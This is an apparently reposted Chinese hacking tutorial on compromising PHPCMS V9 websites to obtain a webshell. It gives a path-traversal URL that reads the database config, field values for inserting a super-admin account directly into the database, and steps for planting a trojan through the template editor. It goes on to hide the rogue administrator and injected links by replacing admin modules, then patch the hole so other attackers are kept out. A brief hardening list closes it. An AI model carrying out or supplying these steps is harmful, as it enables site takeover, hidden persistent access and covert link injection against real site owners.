【轉】詳解：利用PHPCMS V9漏洞入侵網站取得webshell權限

考慮到本文涉及到的v9漏洞已公佈很長時間，並且官方早已給出補丁，對絕大部分站點影響已經很小，湛藍特將此方法發佈與大家分享學習，此方法可取得目標站點webshell權限，上傳任意木馬控制站點。

湛藍天空

聲明：本方法具有很強針對攻擊性，目的是讓大家瞭解黑客利用開源系統PHPCMS V9漏洞入侵網站，取得webshell權限並添加持久錨鏈接的一般流程。請勿對任何漏洞站點進行測試和惡意破壞，以免在您技術水平不足的狀況下暴露身份信息進而被追究法律責任。任何團體及個人由此引起的違法行爲，湛藍天空均不負法律連帶責任。

本文利用了PHPCMS V9的兩個漏洞，一個是讀取任意文件漏洞，另一個是模版運行php腳本漏洞。使用到的工具：Navicat for Mysql/IE瀏覽器(建議使用代理)/湛藍v9代碼包（包含文中使用到的所有文件、代碼和木馬）

1、放置data.txt以備在目標站點讀取並在目標站點生成PHP木馬腳本使用。

例如將data.txt放置在http://yun.baidu.com/j0192/data.txt

2、通過v9漏洞獲取配置信息（請參閱：phpcms V9最新讀取站點任意文件漏洞http://skyhome.cn/phpcms/176.html）。

/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

3、通過v9系統漏洞獲取到的數據庫信息遠程登陸目標站點數據庫，在v9_admin和v9_sso_admin表中添加賬號

username字段：admn
password字段：10203d4623c1957d041818196ff9822a
encrypt 字段：bGV22e
issuper 字段: 1

4、通過數據庫添加管理員賬號後使用以下用戶名密碼在後臺登陸，然後修改當前用戶密碼。

用戶名：admn
密碼：123456

5、ctrl+a複製write.php全部內容粘貼進v9默認模版下的footer.html保存，然後點擊footer.html的可視化運行該模版中的腳本，到此時就完成在目標站點生成木馬腳本。

6、打開http://www.ifeng.com/caches/caches_template/default/wap/data.class.php

用戶名：admin
密碼：admin

7、隱藏新增加的管理員。

通過木馬腳本上傳替換/phpcms/modules/admin/admin_manage.php(默認匹配%admn%)，然後登陸目標站點後臺查看管理員列表是否還有用戶名爲admn的超級管理員，如果沒有則表明我們完成了新加管理員的隱藏。

8、隱藏新增加的關聯鏈接

通過木馬腳本上傳替換/phpcms/modules/admin/keylink.php((默認匹配%skyhome%))

9、將目標網站的漏洞修復，以防其他黑客入侵。

通過木馬腳本上傳替換/phpcms/modules/search/index.php

防黑參考:

1、關閉數據庫遠程訪問。
2、靜態文件及附件等文件目錄禁止執行權限。
3、腳本文件目錄禁止寫權限。
4、系統後臺等重要目錄限制IP訪問。
5、及時關注開源系統官方補丁升級和烏雲、sebug等漏洞發佈平臺，修復系統漏洞。